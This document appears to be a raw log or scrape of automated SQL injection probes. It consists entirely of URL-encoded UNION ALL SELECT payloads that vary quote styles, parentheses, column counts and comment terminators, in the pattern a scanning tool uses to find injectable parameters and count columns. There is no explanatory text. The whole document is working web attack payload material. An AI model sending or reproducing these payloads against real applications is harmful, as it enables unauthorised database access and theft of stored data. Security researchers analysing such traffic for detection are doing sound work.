-7380%22%20UNION%20ALL%20SELECT%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068%2C%204068--%20%20AND%20%22EfrZ%22%3D%22EfrZ -8912%22%20UNION%20ALL%20SELECT%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640%2C%207640--%20%20AND%20%22Fihn%22%3D%22Fihn -9272%22%20UNION%20ALL%20SELECT%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587%2C%206587--%20%20AND%20%22FzGR%22%3D%22FzGR -7020%22%20UNION%20ALL%20SELECT%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311%2C%206311--%20%20AND%20%22oqIF%22%3D%22oqIF -9211%22%20UNION%20ALL%20SELECT%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867%2C%204867--%20%20AND%20%22BUhV%22%3D%22BUhV -1244%22%20UNION%20ALL%20SELECT%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996%2C%209996--%20%20AND%20%22uaLI%22%3D%22uaLI -5160%22%29%20UNION%20ALL%20SELECT%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616%2C%206616--%20%20AND%20%28%22DBvP%22%20LIKE%20%22DBvP -9968%22%29%20UNION%20ALL%20SELECT%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283%2C%206283--%20%20AND%20%28%22XeDH%22%20LIKE%20%22XeDH -7332%22%29%20UNION%20ALL%20SELECT%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034%2C%208034--%20%20AND%20%28%22iwKa%22%20LIKE%20%22iwKa -5590%22%29%20UNION%20ALL%20SELECT%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070%2C%207070--%20%20AND%20%28%22aPKW%22%20LIKE%20%22aPKW -9434%22%29%20UNION%20ALL%20SELECT%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307%2C%205307--%20%20AND%20%28%22qeXd%22%20LIKE%20%22qeXd -8043%22%29%20UNION%20ALL%20SELECT%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282%2C%203282--%20%20AND%20%28%22lZTs%22%20LIKE%20%22lZTs -8541%22%29%20UNION%20ALL%20SELECT%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139%2C%205139--%20%20AND%20%28%22rWLf%22%20LIKE%20%22rWLf -8051%22%29%20UNION%20ALL%20SELECT%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095%2C%208095--%20%20AND%20%28%22dEDU%22%20LIKE%20%22dEDU -2188%22%29%20UNION%20ALL%20SELECT%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323%2C%201323--%20%20AND%20%28%22VaJL%22%20LIKE%20%22VaJL -4141%22%29%20UNION%20ALL%20SELECT%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721%2C%209721--%20%20AND%20%28%22jQgA%22%20LIKE%20%22jQgA -9957%22%29%29%20UNION%20ALL%20SELECT%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250%2C%204250--%20%20AND%20%28%28%22kGMh%22%20LIKE%20%22kGMh -6219%22%29%29%20UNION%20ALL%20SELECT%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732%2C%203732--%20%20AND%20%28%28%22PEZW%22%20LIKE%20%22PEZW -6177%22%29%29%20UNION%20ALL%20SELECT%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422%2C%204422--%20%20AND%20%28%28%22TPlX%22%20LIKE%20%22TPlX -5272%22%29%29%20UNION%20ALL%20SELECT%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721%2C%208721--%20%20AND%20%28%28%22pyvw%22%20LIKE%20%22pyvw -7841%22%29%29%20UNION%20ALL%20SELECT%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387%2C%205387--%20%20AND%20%28%28%22xlEc%22%20LIKE%20%22xlEc -2402%22%29%29%20UNION%20ALL%20SELECT%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038%2C%204038--%20%20AND%20%28%28%22ViZE%22%20LIKE%20%22ViZE -8347%22%29%29%20UNION%20ALL%20SELECT%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816%2C%205816--%20%20AND%20%28%28%22qevX%22%20LIKE%20%22qevX -5864%22%29%29%20UNION%20ALL%20SELECT%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037--%20%20AND%20%28%28%22pzoL%22%20LIKE%20%22pzoL -8662%22%29%29%20UNION%20ALL%20SELECT%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772%2C%207772--%20%20AND%20%28%28%22pIXu%22%20LIKE%20%22pIXu -1851%22%29%29%20UNION%20ALL%20SELECT%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916--%20%20AND%20%28%28%22ejuG%22%20LIKE%20%22ejuG -8701%22%29%29%29%20UNION%20ALL%20SELECT%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477%2C%207477--%20%20AND%20%28%28%28%22VyDZ%22%20LIKE%20%22VyDZ -7371%22%29%29%29%20UNION%20ALL%20SELECT%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263%2C%208263--%20%20AND%20%28%28%28%22Tqww%22%20LIKE%20%22Tqww -8864%22%29%29%29%20UNION%20ALL%20SELECT%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325--%20%20AND%20%28%28%28%22EAgw%22%20LIKE%20%22EAgw -1678%22%29%29%29%20UNION%20ALL%20SELECT%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239%2C%206239--%20%20AND%20%28%28%28%22pbAM%22%20LIKE%20%22pbAM -5095%22%29%29%29%20UNION%20ALL%20SELECT%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796%2C%204796--%20%20AND%20%28%28%28%22TOuf%22%20LIKE%20%22TOuf -4309%22%29%29%29%20UNION%20ALL%20SELECT%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162%2C%207162--%20%20AND%20%28%28%28%22NZtR%22%20LIKE%20%22NZtR -2236%22%29%29%29%20UNION%20ALL%20SELECT%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886%2C%203886--%20%20AND%20%28%28%28%22GhFX%22%20LIKE%20%22GhFX -2764%22%29%29%29%20UNION%20ALL%20SELECT%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800%2C%204800--%20%20AND%20%28%28%28%22nYSA%22%20LIKE%20%22nYSA -6671%22%29%29%29%20UNION%20ALL%20SELECT%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362%2C%204362--%20%20AND%20%28%28%28%22Hhtw%22%20LIKE%20%22Hhtw -9751%22%29%29%29%20UNION%20ALL%20SELECT%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923%2C%201923--%20%20AND%20%28%28%28%22wdMp%22%20LIKE%20%22wdMp -4050%22%20UNION%20ALL%20SELECT%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766--%20%20AND%20%22ljER%22%20LIKE%20%22ljER -2901%22%20UNION%20ALL%20SELECT%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177%2C%208177--%20%20AND%20%22dogn%22%20LIKE%20%22dogn -3965%22%20UNION%20ALL%20SELECT%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829%2C%208829--%20%20AND%20%22mjKv%22%20LIKE%20%22mjKv -6942%22%20UNION%20ALL%20SELECT%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691%2C%201691--%20%20AND%20%22qYEx%22%20LIKE%20%22qYEx -1960%22%20UNION%20ALL%20SELECT%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142%2C%206142--%20%20AND%20%22zuQo%22%20LIKE%20%22zuQo -4078%22%20UNION%20ALL%20SELECT%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022%2C%209022--%20%20AND%20%22mPYp%22%20LIKE%20%22mPYp -9346%22%20UNION%20ALL%20SELECT%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844%2C%209844--%20%20AND%20%22BGXV%22%20LIKE%20%22BGXV -6968%22%20UNION%20ALL%20SELECT%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264--%20%20AND%20%22YGOg%22%20LIKE%20%22YGOg -3560%22%20UNION%20ALL%20SELECT%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725%2C%208725--%20%20AND%20%22prCe%22%20LIKE%20%22prCe -1889%22%20UNION%20ALL%20SELECT%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553%2C%202553--%20%20AND%20%22bwOk%22%20LIKE%20%22bwOk -2007%29%20WHERE%208820%3D8820%20UNION%20ALL%20SELECT%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820--%20 -3458%29%20WHERE%207424%3D7424%20UNION%20ALL%20SELECT%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424%2C%207424--%20 -3533%29%20WHERE%207598%3D7598%20UNION%20ALL%20SELECT%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598%2C%207598--%20 -4357%29%20WHERE%201617%3D1617%20UNION%20ALL%20SELECT%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617%2C%201617--%20 -5936%29%20WHERE%203752%3D3752%20UNION%20ALL%20SELECT%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752%2C%203752--%20 -9800%29%20WHERE%205839%3D5839%20UNION%20ALL%20SELECT%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839%2C%205839--%20 -7973%29%20WHERE%207962%3D7962%20UNION%20ALL%20SELECT%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962%2C%207962--%20 -1146%29%20WHERE%205417%3D5417%20UNION%20ALL%20SELECT%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417%2C%205417--%20 -9834%29%20WHERE%205760%3D5760%20UNION%20ALL%20SELECT%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760%2C%205760--%20 -6642%29%20WHERE%202251%3D2251%20UNION%20ALL%20SELECT%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251%2C%202251--%20 -1086%27%29%20WHERE%206633%3D6633%20UNION%20ALL%20SELECT%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633%2C%206633--%20 -7557%27%29%20WHERE%206003%3D6003%20UNION%20ALL%20SELECT%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003%2C%206003--%20 -2598%27%29%20WHERE%207240%3D7240%20UNION%20ALL%20SELECT%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240%2C%207240--%20 -9027%27%29%20WHERE%202234%3D2234%20UNION%20ALL%20SELECT%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234%2C%202234--%20 -1383%27%29%20WHERE%206780%3D6780%20UNION%20ALL%20SELECT%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780%2C%206780--%20 -4053%27%29%20WHERE%202004%3D2004%20UNION%20ALL%20SELECT%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004%2C%202004--%20 -8021%27%29%20WHERE%202537%3D2537%20UNION%20ALL%20SELECT%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537%2C%202537--%20 -9721%27%29%20WHERE%201873%3D1873%20UNION%20ALL%20SELECT%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873%2C%201873--%20 -2031%27%29%20WHERE%209959%3D9959%20UNION%20ALL%20SELECT%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959%2C%209959--%20 -9850%27%29%20WHERE%202388%3D2388%20UNION%20ALL%20SELECT%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388%2C%202388--%20 -1079%27%20WHERE%208742%3D8742%20UNION%20ALL%20SELECT%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742%2C%208742--%20 -9813%27%20WHERE%205696%3D5696%20UNION%20ALL%20SELECT%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696%2C%205696--%20 -1019%27%20WHERE%203001%3D3001%20UNION%20ALL%20SELECT%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001%2C%203001--%20 -8278%27%20WHERE%207802%3D7802%20UNION%20ALL%20SELECT%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802%2C%207802--%20 -3185%27%20WHERE%207174%3D7174%20UNION%20ALL%20SELECT%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174%2C%207174--%20 -9735%27%20WHERE%209023%3D9023%20UNION%20ALL%20SELECT%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023%2C%209023--%20 -8106%27%20WHERE%206020%3D6020%20UNION%20ALL%20SELECT%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020%2C%206020--%20 -9352%27%20WHERE%205013%3D5013%20UNION%20ALL%20SELECT%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013%2C%205013--%20 